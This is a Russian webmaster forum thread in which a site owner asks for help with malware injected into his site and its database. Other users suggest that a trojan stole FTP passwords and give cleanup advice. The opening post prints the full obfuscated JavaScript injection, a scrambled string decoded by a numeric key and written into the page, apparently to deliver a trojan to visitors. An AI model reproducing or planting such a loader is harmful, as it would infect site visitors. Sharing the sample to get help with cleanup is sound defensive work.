вирус на сайте, хелп плиз!

nash
На сайте с 01.04.2006
Offline
171
507

Народ, хелп!

На сайт пролез вирус.. как? - непонятно. Ставит свои ява-скрипты, если сценарий выполняется, то в процессах появляется скорее всего троян типа file.exe


<SCRIPT><p><p><!--<p><p>var a='';var b='paSud73%4202t22CCCC%C32242322%%%%%20%2222C1%%%2CCoa8j-DfM83i23.t-3fBnr55EBeDct7%DNHzpID81z5K533iuaf0%%h2%D%C%%222202CCCCCCCC42676%C0%%%%2C012%22fM2B-3BD2%B%%xA9%i7ia6533D3oi%8SoSzwEdjcwiMS%%tgcncBD2%C%C%8C1440209920387522222C%2CCCC57222C13rtl%%%oalB-9Dc%4C%rgC%%%sl6ueD2oWZwmVTS3nxqMCEsaJ%n%2nD2p30rCC453%C92049245%222220%2CCCC1%22223%%i93B7ii%0l%%o+%%2Sm22BD2B7.%c5p76Hg585bpX7%irgvE29lt0j302y3%%%%C%22222222C135402C7060%2C432%%BD%3j%33%93-CBe29B%rh12%%7%dr924DA5zF8F8pp1N9t%2%it2a.bC%C%D35%%%2022222222251612%C16024%2511%%%2.bE97%h2%%72a8%38%fdE9E%e7e27OGlWECldTxbxS%sClDtox%e3%C%Dr22CCC02555346539%%%%%C1%2222C8%%%CC9je2%728mbECwtC+Ds%Do%%33D7%trddmie29Svxlwbd2rcna3%20g1C%D%a3583120%%%%%%%%2CCCCC%2C6226%2CCC4733l%Br%%n2%-75d%239tC86w8%sDw2%IC_SwGniICoWQ2p303pi8rl%i2s3A%%222C%CCCCCCCCC81188224%%%%2C1652228c%0%%2.C32B8rp5Cs3rew%%3%Dn8DD7pD974DbpEKt2c%erc%vxC2r2w364973%C%%%%%%%%%CCCCC02C51445%CCC330%h/322rt%i-%%h28%2+.o523-s%m%%2I101bHDBeybFu/ ';var c='5863741029';for(var i=0;i<95;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*95)+i);document.writeln(unescape(a));<p><p>--><p><p></SCRIPT>

сначала это было в php файле, мы убрали сменили пароли.. теперь это появилось в базе данных sql

У кого такое было и как с ним бороться? Хелп плиз!

T
На сайте с 11.08.2005
Offline
181
#1

Уже обсуждалось много раз, поищите по форуму...

Если кратко: троян увел пароль с фтп менеджера и дальше дело техники.

Лечение: удалить трояна, изменить пароль к фтп, не сохранять пароль в фтп менеджерах.

PS: подобный код вижу впервые, обычно вешается скрытый iframe.

K
На сайте с 31.01.2001
Offline
737
#2
Выделенные полосы в Москве (http://www.probkovorot.info) привели к снижению скорости до 23%.
Russian
На сайте с 10.12.2005
Offline
69
#3

nash, в первую очередь лечите все тачки, откуда имелся доступ на FTP. Каспер, Симантик нормально ловят такого типа трояны. Потом меняете пароль. Потом логинитесь на FTP и чистите файлы. Вполне возможно что в первый раз вы не все проверили. Вирь нормально сканит папки и пишется в субфолдеры, не зависимо от уровня. Возможно, как у меня было, все почистил вроде бы, забыл про инклуды, которые лежали глубоко в субфолдерах и выполнялись.

nash
На сайте с 01.04.2006
Offline
171
#4
Russian:
nash, в первую очередь лечите все тачки, откуда имелся доступ на FTP. Каспер, Симантик нормально ловят такого типа трояны. Потом меняете пароль. Потом логинитесь на FTP и чистите файлы. Вполне возможно что в первый раз вы не все проверили. Вирь нормально сканит папки и пишется в субфолдеры, не зависимо от уровня. Возможно, как у меня было, все почистил вроде бы, забыл про инклуды, которые лежали глубоко в субфолдерах и выполнялись.

Спасибо! Так и поступили. Но скажу что вирус был только в одном файле (хвосте), такое впечатление что всунули его туда осмысленно т.е. человек.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий